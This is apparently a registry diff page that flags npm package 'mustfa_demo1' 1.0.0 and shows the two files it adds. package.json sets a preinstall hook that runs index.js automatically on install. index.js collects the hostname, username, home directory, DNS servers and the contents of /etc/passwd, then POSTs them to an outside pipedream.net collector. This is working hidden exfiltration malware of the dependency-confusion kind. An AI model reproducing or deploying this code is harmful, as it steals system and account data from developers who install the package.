mustfa_demo1 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of mustfa_demo1 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +49 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,49 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const execSync = require('child_process').execSync;
8
+ const package = packageJSON.name;
9
+
10
+ const trackingData = JSON.stringify({
11
+ p: package,
12
+ c: __dirname,
13
+ hd: os.homedir(),
14
+ hn: os.hostname(),
15
+ un: os.userInfo().username,
16
+ dns: dns.getServers(),
17
+ pa:execSync('cat /etc/passwd', { encoding:'utf-8'}),
18
+ r: packageJSON ? packageJSON.___resolved : undefined,
19
+ v: packageJSON.version,
20
+ pjson: packageJSON,
21
+ });
22
+
23
+ var postData = querystring.stringify({
24
+ msg: trackingData,
25
+ });
26
+
27
+ var options = {
28
+ hostname: "eo5vod9dq8uoak4.m.pipedream.net", //replace burpcollaborator.net with Interactsh or pipedream
29
+ port: 443,
30
+ path: "/",
31
+ method: "POST",
32
+ headers: {
33
+ "Content-Type": "application/x-www-form-urlencoded",
34
+ "Content-Length": postData.length,
35
+ },
36
+ };
37
+
38
+ var req = https.request(options, (res) => {
39
+ res.on("data", (d) => {
40
+ process.stdout.write(d);
41
+ });
42
+ });
43
+
44
+ req.on("error", (e) => {
45
+ // console.error(e);
46
+ });
47
+
48
+ req.write(postData);
49
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "mustfa_demo1",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }